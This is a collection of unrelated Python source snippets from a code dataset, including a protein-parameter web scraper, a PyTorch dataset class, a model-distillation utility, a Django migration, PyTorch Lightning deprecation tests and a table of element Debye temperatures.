return "'"+geneid+"',"+ls[2]+","+ls[3]+","+ls[4]+","+ls[5]+","+ls[0]+","+ls[1]+","+ls[6]+","+ls[7]+",'"+ls[8]+"'"
def get_expasy(self,geneid,seq,session):
seq=seq.replace('*','').replace(' ','').replace('\n','').replace('\t','').replace('\r','')
data={'sequence':seq}
while True:
try:
r=session.post(self.url,headers=self.headers,data=data)
break
except:
print('{} retry...'.format(geneid))
ls=self.get_params(r.text)
self.save_db(self.process_ls(geneid,ls))
def get_params(self,s):
pattern=re.compile('<B>Aliphatic index:</B> (.*)')
p1=pattern.findall(s)[0]
pattern=re.compile('<B>Grand average of hydropathicity \(GRAVY\):</B> (.*)')
p2=pattern.findall(s)[0]
pattern=re.compile('<B>Number of amino acids:</B> (.*)')
p3=pattern.findall(s)[0]
pattern=re.compile('<B>Molecular weight:</B> (.*)')
p4=pattern.findall(s)[0]
pattern=re.compile('<B>Theoretical pI:</B> (.*)')
p5=pattern.findall(s)[0]
pattern=re.compile(' is computed to be (.*)') # Instability index
p6=pattern.findall(s)[0]
pattern=re.compile('<B>Total number of negatively charged residues \(Asp \+ Glu\):</B> (.*)')
p7=pattern.findall(s)[0]
pattern=re.compile('<B>Total number of positively charged residues \(Arg \+ Lys\):</B> (.*)')
p8=pattern.findall(s)[0]
pattern=re.compile('<B>Formula:</B> (.*)')
p9=pattern.findall(s)[0].replace('<SUB>','').replace('</SUB>','')
return [p1,p2,p3,p4,p5,p6,p7,p8,p9]
def run_process(self,startpoint,endpoint):
session = requests.Session()
for i in self.gene_ls[startpoint:endpoint]:
self.get_expasy(i[0],i[1],session)
self.finish_num+=1
if self.finish_num==self.num_process:
print('Done!')
def run(self,num_process):
self.num_process=num_process
numtotal=len(self.gene_ls)
for i in range(self.num_process):
startpoint=i*int(numtotal/self.num_process)
if i==self.num_process-1:
endpoint=numtotal
else:
endpoint=(i+1)*int(numtotal/self.num_process)
threading.Thread(target=self.run_process,args=(startpoint,endpoint)).start()
def write_table(self,filename):
conn = sqlite3.connect(self.dbname)
r=conn.execute("select * from "+self.tablename)
s='Gene ID,Num of aa,Molecular weight,Theoretical pI,Instability index,Aliphatic index,GRAVY,Number of negatively charged residues,Number of positively charged residues,Formula\n'
for i in r.fetchall():
for j in i:
try:
s+=j+','
except:
s+=str(j)+','
s=s[:-1]+'\n'
with open(filename,'w+') as f:
f.write(s)
if __name__=='__main__':
c=ProtParam('test.db','expasy')
c.load_gene('test.csv')
c.run(17)
|
StarcoderdataPython
|
16389
|
<reponame>ngupta23/more
# For Time Logging
import time
from contextlib import contextmanager
import logging
@contextmanager
# Timing Function
def time_usage(name=""):
"""
log the time usage in a code block
"""
# print ("In time_usage runID = {}".format(runID))
start = time.time()
yield
end = time.time()
elapsed_seconds = float("%.10f" % (end - start))
logging.info('%s: Time Taken (seconds): %s', name, elapsed_seconds)
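# Example usage (a minimal sketch, not part of the original module; assumes the
# caller configures logging, and the block name and sleep below are illustrative only):
if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)
    with time_usage("sleep demo"):
        time.sleep(0.5)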
|
StarcoderdataPython
|
4804865
|
from torch.utils.data import Dataset
import torch
import os
class HANDataset(Dataset):
"""
A PyTorch Dataset class to be used in a PyTorch DataLoader to create batches.
"""
def __init__(self, data_folder, split):
"""
:param data_folder: folder where data files are stored
:param split: split, one of 'TRAIN' or 'TEST'
"""
split = split.upper()
assert split in {'TRAIN', 'TEST'}
self.split = split
# Load data
self.data = torch.load(os.path.join(data_folder, split + '_data.pth.tar'))
def __getitem__(self, i):
return torch.LongTensor(self.data['docs'][i]), \
torch.LongTensor([self.data['sentences_per_document'][i]]), \
torch.LongTensor(self.data['words_per_sentence'][i]), \
torch.LongTensor([self.data['labels'][i]])
def __len__(self):
return len(self.data['labels'])
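# Example usage (a sketch, not part of the original file; assumes a
# './data/TRAIN_data.pth.tar' file produced beforehand by the preprocessing step,
# and the folder path and batch size are illustrative only):
if __name__ == "__main__":
    from torch.utils.data import DataLoader
    train_loader = DataLoader(HANDataset('./data', 'train'), batch_size=64, shuffle=True)
    docs, sentences_per_document, words_per_sentence, labels = next(iter(train_loader))
    print(docs.shape, labels.shape)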
|
StarcoderdataPython
|
3247878
|
<gh_stars>1-10
# ---------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# ---------------------------------------------------------
"""Utilities to train a surrogate model from teacher."""
import numpy as np
from scipy.sparse import issparse, isspmatrix_csr, vstack as sparse_vstack
def _soft_logit(values, clip_val=5):
"""Compute a soft logit on an iterable by bounding outputs to a min/max value.
:param values: Iterable of numeric values to logit and clip.
:type values: iter
:param clip_val: Clipping threshold for logit output.
:type clip_val: Union[Int, Float]
"""
new_values = np.log(values / (1 - values))
return np.clip(new_values, -clip_val, clip_val)
def _model_distill(teacher_model_predict_fn, uninitialized_surrogate_model, data, original_training_data,
explainable_model_args):
"""Teach a surrogate model to mimic a teacher model.
:param teacher_model_predict_fn: Blackbox model's prediction function.
:type teacher_model_predict_fn: function
:param uninitialized_surrogate_model: Uninitialized model used to distill blackbox.
:type uninitialized_surrogate_model: uninitialized model
:param data: Representative data (or training data) to train distilled model.
:type data: numpy.ndarray
:param original_training_data: Representative data (or training data) to get predictions from teacher model.
:type original_training_data: numpy.ndarray
:param explainable_model_args: An optional map of arguments to pass to the explainable model
for initialization.
:type explainable_model_args: dict
"""
# For regression, teacher_y is a real value whereas for classification it is a probability between 0 and 1
teacher_y = teacher_model_predict_fn(original_training_data)
multiclass = False
training_labels = None
is_classifier = len(teacher_y.shape) == 2
# If the predict_proba function returned one column but this is a classifier, modify to [1-p, p]
if is_classifier and teacher_y.shape[1] == 1:
teacher_y = np.column_stack((1 - teacher_y, teacher_y))
if is_classifier and teacher_y.shape[1] > 2:
# If more than two classes, use multiclass surrogate
multiclass = True
# For multiclass case, we need to train on the class label
training_labels = np.argmax(teacher_y, axis=1)
unique_labels = set(np.unique(training_labels))
if len(unique_labels) < teacher_y.shape[1]:
# Get the missing labels
missing_labels = set(range(teacher_y.shape[1])).difference(unique_labels)
# Append some rows with the missing labels
for missing_label in missing_labels:
# Find max prob for missing label
max_row_index = np.argmax(teacher_y[:, missing_label])
# Append the extra label to data and y value
training_labels = np.append(training_labels, missing_label)
if issparse(data) and not isspmatrix_csr(data):
data = data.tocsr()
vstack = sparse_vstack if issparse(data) else np.vstack
data = vstack([data, data[max_row_index:max_row_index + 1, :]])
surrogate_model = uninitialized_surrogate_model(multiclass=multiclass,
**explainable_model_args)
else:
surrogate_model = uninitialized_surrogate_model(**explainable_model_args)
if is_classifier and teacher_y.shape[1] == 2:
# Make sure output has only 1 dimension
teacher_y = teacher_y[:, 1]
# Transform to logit space and fit regression
surrogate_model.fit(data, _soft_logit(teacher_y))
else:
# Use hard labels for regression or multiclass case
if training_labels is None:
training_labels = teacher_y
surrogate_model.fit(data, training_labels)
return surrogate_model
|
StarcoderdataPython
|
3269537
|
<reponame>HoboJoe2/rps101
class Weapon():
def __init__(self, **kwargs):
self.__dict__.update(**kwargs)
|
StarcoderdataPython
|
15891
|
<filename>lang/Python/terminal-control-cursor-positioning-1.py
print("\033[6;3HHello")
|
StarcoderdataPython
|
3238023
|
import urllib2
import json
import interface
class Poloniex(interface.MarketExplorer):
def __init__(self):
pass
def exchange_name(self):
return 'poloniex'
def markets(self):
req = urllib2.urlopen('https://poloniex.com/public?command=returnTicker')
js = json.loads(req.read())
markets = []
for pair, value in js.iteritems():
if value['isFrozen'] == "0":
pairarr = pair.split('_')
markets.append(self.create_market(pairarr[1], pairarr[0]))
print pair
return markets
|
StarcoderdataPython
|
157014
|
import logging
import time
import sys, os
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '../'))
from tweets_crawler import db as DB
def doSummary(candidates):
while True:
msg = "\nSummary:\n"
db = DB.DB()
total = 0
for cand in candidates:
cand = cand.strip()
if cand == "": continue
pattern = cand.strip() + "*"
count = db.count(pattern)
total += count
msg += "\t Tweets of " + cand + ": " + str(count) + "\n"
msg += "\t===================================\n"
msg += "\t Total: " + str(total) + "\n"
logging.info(msg)
with open('last_summary.log', 'w') as f:
f.write(msg)
time.sleep(60*30)
if __name__ == "__main__":
log_format = "%(asctime)s - %(message)s"
logging.basicConfig(filename = 'summary.log',level=logging.INFO, format = log_format)
candidates = None
with open('candidates') as f:
candidates = f.readlines()
doSummary(candidates)
|
StarcoderdataPython
|
3232023
|
<filename>pupper/ServoCalibration.py
# WARNING: This file is machine generated. Edit at your own risk.
import numpy as np
MICROS_PER_RAD = 11.333 * 180.0 / np.pi
NEUTRAL_ANGLE_DEGREES = np.array(
[[ 0., 0., 0., 0.],
[ 45., 45., 45., 45.],
[-45.,-45.,-45.,-45.]]
)
|
StarcoderdataPython
|
3347937
|
<reponame>T4rk1n/precept
import pytest
from precept import ImmutableDict
from precept.errors import ImmutableError
def test_immutable_dict():
data = ImmutableDict(foo='bar', bar='foo', n=1)
assert 'foo' in data
assert data.get('bar') == 'foo'
assert data.foo == 'bar'
assert data['n'] == 1
assert len(data) == 3
with pytest.raises(TypeError):
data['foo'] = 'not foo'
with pytest.raises(KeyError):
# pylint: disable=unused-variable
d = data.dont_exist # noqa: F841
with pytest.raises(ImmutableError):
# pylint: disable=attribute-defined-outside-init
data.foo = 'not foo'
def test_immutable_props():
class TestDict(ImmutableDict):
def __init__(self, foo, bar, keyword='keyword'):
super(TestDict, self).__init__(foo=foo, bar=bar, keyword=keyword)
first = TestDict('foo', 'bar')
assert first.foo == 'foo'
assert first.bar == 'bar'
assert first.keyword == 'keyword'
assert len(first) == 3
with pytest.raises(ImmutableError) as context:
# pylint: disable=attribute-defined-outside-init
first.foo = 'bar'
assert 'TestDict.foo is immutable' in str(context.value)
second = TestDict(1, 2, keyword='foobar')
assert second.keyword == 'foobar'
assert len(second) == 3
|
StarcoderdataPython
|
1725447
|
<filename>starter/starter_PubRouterDeposit.py
import json
from starter.starter_helper import NullRequiredDataException
from starter.objects import Starter, default_workflow_params
from provider import utils
"""
Amazon SWF PubRouterDeposit starter
"""
class starter_PubRouterDeposit(Starter):
def __init__(self, settings=None, logger=None):
super(starter_PubRouterDeposit, self).__init__(
settings, logger, "PubRouterDeposit"
)
def get_workflow_params(self, workflow=None):
if workflow is None:
raise NullRequiredDataException(
"Did not get a workflow argument. Required."
)
workflow_params = default_workflow_params(self.settings)
workflow_params["workflow_id"] = "%s_%s" % (self.name, workflow)
workflow_params["workflow_name"] = self.name
workflow_params["workflow_version"] = "1"
data = {}
data["workflow"] = workflow
info = {
"data": data,
}
workflow_params["input"] = json.dumps(info, default=lambda ob: None)
return workflow_params
def start(self, settings, workflow=None):
"""method for backwards compatibility"""
self.settings = settings
self.instantiate_logger()
self.start_workflow(workflow)
def start_workflow(self, workflow=None):
workflow_params = self.get_workflow_params(workflow)
self.start_workflow_execution(workflow_params)
if __name__ == "__main__":
ENV, WORKFLOW = utils.console_start_env_workflow()
SETTINGS = utils.get_settings(ENV)
STARTER = starter_PubRouterDeposit(SETTINGS)
STARTER.start_workflow(workflow=WORKFLOW)
|
StarcoderdataPython
|
1601795
|
<filename>BACKEND_POC/app/migrations/0001_initial.py<gh_stars>1-10
# Generated by Django 3.1.1 on 2020-09-17 09:41
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='AttribType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('label', models.CharField(max_length=128, unique=True)),
('raw_type', models.IntegerField(choices=[(0, 'BOOL'), (1, 'FLOAT'), (2, 'INTEGER'), (3, 'STRING'), (4, 'DICT')])),
],
),
migrations.CreateModel(
name='Graph',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100, unique=True)),
('attribute_json', models.JSONField(blank=True, default=dict)),
('next_vertex_id', models.IntegerField(default=1)),
('next_transaction_id', models.IntegerField(default=1)),
],
),
migrations.CreateModel(
name='GraphAttribDefTrans',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('label', models.CharField(max_length=128)),
('descr', models.CharField(blank=True, default='', max_length=256, null=True)),
('default_str', models.TextField(blank=True, default=None, null=True)),
('graph_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.graph')),
('type_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.attribtype')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='GraphAttribDefVertex',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('label', models.CharField(max_length=128)),
('descr', models.CharField(blank=True, default='', max_length=256, null=True)),
('default_str', models.TextField(blank=True, default=None, null=True)),
('graph_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.graph')),
('type_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.attribtype')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Schema',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('label', models.CharField(max_length=128, unique=True)),
],
),
migrations.CreateModel(
name='Transaction',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tx_id', models.IntegerField()),
('tx_dir', models.BooleanField(default=True)),
('attribute_json', models.JSONField(blank=True, default=dict)),
('graph_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.graph')),
],
),
migrations.CreateModel(
name='Vertex',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('vx_id', models.IntegerField()),
('attribute_json', models.JSONField(blank=True, default=dict)),
('graph_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.graph')),
],
),
migrations.CreateModel(
name='VertexAttrib',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('value_str', models.TextField(blank=True, default='')),
('attrib_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.graphattribdefvertex')),
('vertex_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='vertex_attribs', to='app.vertex')),
],
),
migrations.CreateModel(
name='TransactionAttrib',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('value_str', models.TextField(blank=True, default='')),
('attrib_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.graphattribdeftrans')),
('transaction_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.transaction')),
],
),
migrations.AddField(
model_name='transaction',
name='vx_dst',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='destination', to='app.vertex'),
),
migrations.AddField(
model_name='transaction',
name='vx_src',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='source', to='app.vertex'),
),
migrations.CreateModel(
name='SchemaAttribDefVertex',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('label', models.CharField(max_length=128)),
('descr', models.CharField(blank=True, default='', max_length=256, null=True)),
('default_str', models.TextField(blank=True, default=None, null=True)),
('schema_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.schema')),
('type_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.attribtype')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='SchemaAttribDefTrans',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('label', models.CharField(max_length=128)),
('descr', models.CharField(blank=True, default='', max_length=256, null=True)),
('default_str', models.TextField(blank=True, default=None, null=True)),
('schema_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.schema')),
('type_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.attribtype')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='SchemaAttribDefGraph',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('label', models.CharField(max_length=128)),
('descr', models.CharField(blank=True, default='', max_length=256, null=True)),
('default_str', models.TextField(blank=True, default=None, null=True)),
('schema_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.schema')),
('type_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.attribtype')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='GraphAttribDefGraph',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('label', models.CharField(max_length=128)),
('descr', models.CharField(blank=True, default='', max_length=256, null=True)),
('default_str', models.TextField(blank=True, default=None, null=True)),
('graph_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.graph')),
('type_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.attribtype')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='GraphAttrib',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('value_str', models.TextField(blank=True, default='')),
('attrib_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.graphattribdefgraph')),
('graph_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='graph_attribs', to='app.graph')),
],
),
migrations.AddField(
model_name='graph',
name='schema_fk',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='app.schema'),
),
migrations.AddConstraint(
model_name='vertexattrib',
constraint=models.UniqueConstraint(fields=('vertex_fk', 'attrib_fk'), name='unique attrib per vertex'),
),
migrations.AddConstraint(
model_name='graphattrib',
constraint=models.UniqueConstraint(fields=('graph_fk', 'attrib_fk'), name='unique attrib per graph'),
),
]
|
StarcoderdataPython
|
3281944
|
<reponame>DaeunYim/pgtoolsservice
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from ossdbtoolsservice.workspace.contracts.common import (
Location, Position, Range, TextDocumentIdentifier, TextDocumentItem,
TextDocumentPosition)
from ossdbtoolsservice.workspace.contracts.did_change_config_notification import (
DID_CHANGE_CONFIG_NOTIFICATION, Configuration,
DidChangeConfigurationParams, FormatterConfiguration,
IntellisenseConfiguration, MySQLConfiguration, PGSQLConfiguration,
SQLConfiguration)
from ossdbtoolsservice.workspace.contracts.did_change_text_doc_notification import (
DID_CHANGE_TEXT_DOCUMENT_NOTIFICATION, DidChangeTextDocumentParams,
TextDocumentChangeEvent)
from ossdbtoolsservice.workspace.contracts.did_close_text_doc_notification import (
DID_CLOSE_TEXT_DOCUMENT_NOTIFICATION, DidCloseTextDocumentParams)
from ossdbtoolsservice.workspace.contracts.did_open_text_doc_notification import (
DID_OPEN_TEXT_DOCUMENT_NOTIFICATION, DidOpenTextDocumentParams)
__all__ = [
'DID_CHANGE_CONFIG_NOTIFICATION', 'DidChangeConfigurationParams',
'Configuration', 'MySQLConfiguration', 'PGSQLConfiguration', 'SQLConfiguration', 'IntellisenseConfiguration',
'FormatterConfiguration', 'DID_CHANGE_TEXT_DOCUMENT_NOTIFICATION', 'DidChangeTextDocumentParams', 'TextDocumentChangeEvent',
'DID_OPEN_TEXT_DOCUMENT_NOTIFICATION', 'DidOpenTextDocumentParams',
'DID_CLOSE_TEXT_DOCUMENT_NOTIFICATION', 'DidCloseTextDocumentParams',
'Location', 'Position', 'Range', 'TextDocumentItem', 'TextDocumentIdentifier', 'TextDocumentPosition'
]
|
StarcoderdataPython
|
131123
|
<reponame>theodumont/pytorch-lightning
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Test deprecated functionality which will be removed in v1.6.0 """
import pytest
from pytorch_lightning import Trainer
from pytorch_lightning.callbacks.early_stopping import EarlyStopping
from pytorch_lightning.plugins.training_type import DDPPlugin, DDPSpawnPlugin
from pytorch_lightning.utilities.model_helpers import is_overridden
from tests.helpers import BoringDataModule, BoringModel
def test_v1_6_0_trainer_model_hook_mixin(tmpdir):
model = BoringModel()
trainer = Trainer(default_root_dir=tmpdir, max_epochs=1, checkpoint_callback=False, logger=False)
trainer.fit(model)
with pytest.deprecated_call(match="is deprecated in v1.4 and will be removed in v1.6"):
trainer.is_function_implemented("training_step", model)
with pytest.deprecated_call(match="is deprecated in v1.4 and will be removed in v1.6"):
trainer.has_arg("training_step", "batch")
def test_v1_6_0_dataloader_renaming(tmpdir):
model = BoringModel()
trainer = Trainer(default_root_dir=tmpdir, fast_dev_run=True)
dl = model.train_dataloader()
with pytest.deprecated_call(match=r"fit\(train_dataloader\)` is deprecated in v1.4"):
trainer.fit(model, train_dataloader=dl)
with pytest.deprecated_call(match=r"validate\(val_dataloaders\)` is deprecated in v1.4"):
trainer.validate(model, val_dataloaders=dl)
with pytest.deprecated_call(match=r"test\(test_dataloaders\)` is deprecated in v1.4"):
trainer.test(model, test_dataloaders=dl)
with pytest.deprecated_call(match=r"tune\(train_dataloader\)` is deprecated in v1.4"):
trainer.tune(model, train_dataloader=dl)
with pytest.deprecated_call(match=r"tune\(train_dataloader\)` is deprecated in v1.4"):
trainer.tuner.scale_batch_size(model, train_dataloader=dl)
with pytest.deprecated_call(match=r"tune\(train_dataloader\)` is deprecated in v1.4"):
trainer.tuner.lr_find(model, train_dataloader=dl)
def test_old_transfer_batch_to_device_hook(tmpdir):
class OldModel(BoringModel):
def transfer_batch_to_device(self, batch, device):
return super().transfer_batch_to_device(batch, device, None)
trainer = Trainer(default_root_dir=tmpdir, limit_train_batches=1, limit_val_batches=0, max_epochs=1)
with pytest.deprecated_call(match='old signature will be removed in v1.6'):
trainer.fit(OldModel())
def test_v1_6_0_ddp_num_nodes():
with pytest.deprecated_call(match="Argument `num_nodes` in `DDPPlugin` is deprecated in v1.4"):
DDPPlugin(num_nodes=1)
def test_v1_6_0_ddp_sync_batchnorm():
with pytest.deprecated_call(match="Argument `sync_batchnorm` in `DDPPlugin` is deprecated in v1.4"):
DDPPlugin(sync_batchnorm=False)
def test_v1_6_0_ddp_spawn_num_nodes():
with pytest.deprecated_call(match="Argument `num_nodes` in `DDPPlugin` is deprecated in v1.4"):
DDPSpawnPlugin(num_nodes=1)
def test_v1_6_0_ddp_spawn_sync_batchnorm():
with pytest.deprecated_call(match="Argument `sync_batchnorm` in `DDPPlugin` is deprecated in v1.4"):
DDPSpawnPlugin(sync_batchnorm=False)
def test_v1_6_0_tbptt_reduce_fx(tmpdir):
class TestModel(BoringModel):
def training_step(self, *args):
self.log("foo", 1, tbptt_reduce_fx=lambda x: x)
return super().training_step(*args)
trainer = Trainer(default_root_dir=tmpdir, fast_dev_run=True)
with pytest.deprecated_call(match=r"tbptt_reduce_fx=...\)` is no longer supported"):
trainer.fit(TestModel())
def test_v1_6_0_tbptt_pad_token(tmpdir):
class TestModel(BoringModel):
def training_step(self, *args):
self.log("foo", 1, tbptt_pad_token=0)
return super().training_step(*args)
trainer = Trainer(default_root_dir=tmpdir, fast_dev_run=True)
with pytest.deprecated_call(match=r"tbptt_pad_token=...\)` is no longer supported"):
trainer.fit(TestModel())
def test_v1_6_0_sync_dist_op(tmpdir):
class TestModel(BoringModel):
def training_step(self, *args):
self.log("foo", 1, sync_dist_op='sum')
return super().training_step(*args)
trainer = Trainer(default_root_dir=tmpdir, fast_dev_run=True)
with pytest.deprecated_call(match=r"`self.log\(sync_dist_op='sum'\)` is deprecated"):
trainer.fit(TestModel())
def test_v1_6_0_datamodule_lifecycle_properties(tmpdir):
dm = BoringDataModule()
with pytest.deprecated_call(match=r"DataModule property `has_prepared_data` was deprecated in v1.4"):
dm.has_prepared_data
with pytest.deprecated_call(match=r"DataModule property `has_setup_fit` was deprecated in v1.4"):
dm.has_setup_fit
with pytest.deprecated_call(match=r"DataModule property `has_setup_validate` was deprecated in v1.4"):
dm.has_setup_validate
with pytest.deprecated_call(match=r"DataModule property `has_setup_test` was deprecated in v1.4"):
dm.has_setup_test
with pytest.deprecated_call(match=r"DataModule property `has_setup_predict` was deprecated in v1.4"):
dm.has_setup_predict
with pytest.deprecated_call(match=r"DataModule property `has_teardown_fit` was deprecated in v1.4"):
dm.has_teardown_fit
with pytest.deprecated_call(match=r"DataModule property `has_teardown_validate` was deprecated in v1.4"):
dm.has_teardown_validate
with pytest.deprecated_call(match=r"DataModule property `has_teardown_test` was deprecated in v1.4"):
dm.has_teardown_test
with pytest.deprecated_call(match=r"DataModule property `has_teardown_predict` was deprecated in v1.4"):
dm.has_teardown_predict
def test_v1_6_0_datamodule_hooks_calls(tmpdir):
"""Test that repeated calls to DataHooks' hooks show a warning about the coming API change."""
class TestDataModule(BoringDataModule):
setup_calls = []
teardown_calls = []
prepare_data_calls = 0
def setup(self, stage=None):
super().setup(stage=stage)
self.setup_calls.append(stage)
def teardown(self, stage=None):
super().teardown(stage=stage)
self.teardown_calls.append(stage)
def prepare_data(self):
super().prepare_data()
self.prepare_data_calls += 1
dm = TestDataModule()
dm.prepare_data()
dm.prepare_data()
dm.setup('fit')
with pytest.deprecated_call(
match=r"DataModule.setup has already been called, so it will not be called again. "
"In v1.6 this behavior will change to always call DataModule.setup"
):
dm.setup('fit')
dm.setup()
dm.setup()
dm.teardown('validate')
with pytest.deprecated_call(
match=r"DataModule.teardown has already been called, so it will not be called again. "
"In v1.6 this behavior will change to always call DataModule.teardown"
):
dm.teardown('validate')
assert dm.prepare_data_calls == 1
assert dm.setup_calls == ['fit', None]
assert dm.teardown_calls == ['validate']
trainer = Trainer(default_root_dir=tmpdir, fast_dev_run=1)
trainer.test(BoringModel(), datamodule=dm)
# same number of calls
assert dm.prepare_data_calls == 1
assert dm.setup_calls == ['fit', None]
assert dm.teardown_calls == ['validate', 'test']
def test_v1_6_0_is_overridden_model():
model = BoringModel()
with pytest.deprecated_call(match="and will be removed in v1.6"):
assert is_overridden("validation_step", model=model)
with pytest.deprecated_call(match="and will be removed in v1.6"):
assert not is_overridden("foo", model=model)
def test_v1_6_0_early_stopping_monitor(tmpdir):
with pytest.deprecated_call(
match=r"The `EarlyStopping\(monitor\)` argument will be required starting in v1.6."
" For backward compatibility, setting this to `early_stop_on`."
):
EarlyStopping()
def test_v1_6_0_extras_with_gradients(tmpdir):
class TestModel(BoringModel):
def training_step(self, *args):
loss = super().training_step(*args)['loss']
return {"loss": loss, 'foo': loss}
trainer = Trainer(default_root_dir=tmpdir, fast_dev_run=1)
model = TestModel()
match = r"\{'foo'\} has a `grad_fn`.*behaviour will change in v1\.6"
with pytest.deprecated_call(match=match):
trainer.fit(model)
def test_v1_6_0_train_loop(tmpdir):
trainer = Trainer()
with pytest.deprecated_call(
match=r"`Trainer.train_loop` has been renamed to `Trainer.fit_loop` and will be removed in v1.6."
):
_ = trainer.train_loop
|
StarcoderdataPython
|
3372893
|
from pycket import config
if config.hidden_classes:
from pycket.impersonators.hidden_classes import *
else:
from pycket.impersonators.baseline import *
|
StarcoderdataPython
|
3332025
|
from output.models.nist_data.atomic.int_pkg.schema_instance.nistschema_sv_iv_atomic_int_max_exclusive_1_xsd.nistschema_sv_iv_atomic_int_max_exclusive_1 import NistschemaSvIvAtomicIntMaxExclusive1
__all__ = [
"NistschemaSvIvAtomicIntMaxExclusive1",
]
|
StarcoderdataPython
|
3279887
|
<reponame>hritools/text-to-speech<gh_stars>0
import setuptools
VERSION = '0.1'
with open('README.md', 'r') as f:
long_description = f.read()
with open('requirements.txt') as f:
required = f.read().splitlines()
setuptools.setup(
name='TextToSpeech-Ru',
python_requires='~=3.7',
version=VERSION,
author='<NAME>',
author_email='<EMAIL>',
description='Speech Synthesis for Russian Language',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://cordelianew.university.innopolis.ru/gitea/hri/text-to-speech.git',
packages=setuptools.find_packages(),
install_requires=required,
)
|
StarcoderdataPython
|
1677211
|
<filename>packages/mccomponents/python/mccomponents/sample/DebyeTemp.py
# -*- Python -*-
"""
Debye temperature of elements
"""
def getT(element, default=None):
return table.get(element, default)
table = dict(
Li=344, Be=1440, C=2230, Ne=75,
Na=158, Mg=400, Al=428, Si=645, Ar=92,
K=91, Ca=230, Sc=360, Ti=420, V=380, Cr=630, Mn=410, Fe=470, Co=445, Ni=450, Cu=343, Zn=327, Ga=320, Ge=374, As=282, Se=90, Kr=72,
Rb=56, Sr=147, Y=280, Zr=291, Nb=275, Mo=450, Ru=600, Rh=480, Pd=274, Ag=225, Cd=209, In=108, Sn=200, Sb=211, Te=153, Xe=64,
Cs=38, Ba=110, La=142, Hf=252, Ta=240, W=400, Re=430, Os=500, Ir=420, Pt=240, Au=165, Hg=71.9, Tl=78.5, Pb=105, Bi=119,
Gd=200, Dy=210, Yb=120, Lu=210,
Th=163, U=207,
)
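# Example usage (sketch):
#   getT('Cu')              -> 343
#   getT('Og', default=300) -> 300 (element not in the table)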
# End of file
|
StarcoderdataPython
|
3218831
|
<reponame>UrbanDave/core
"""Test for Sensibo component Init."""
from __future__ import annotations
from unittest.mock import patch
from homeassistant import config_entries
from homeassistant.components.sensibo.const import DOMAIN
from homeassistant.components.sensibo.util import NoUsernameError
from homeassistant.config_entries import SOURCE_USER
from homeassistant.core import HomeAssistant
from . import ENTRY_CONFIG
from .response import DATA_FROM_API
from tests.common import MockConfigEntry
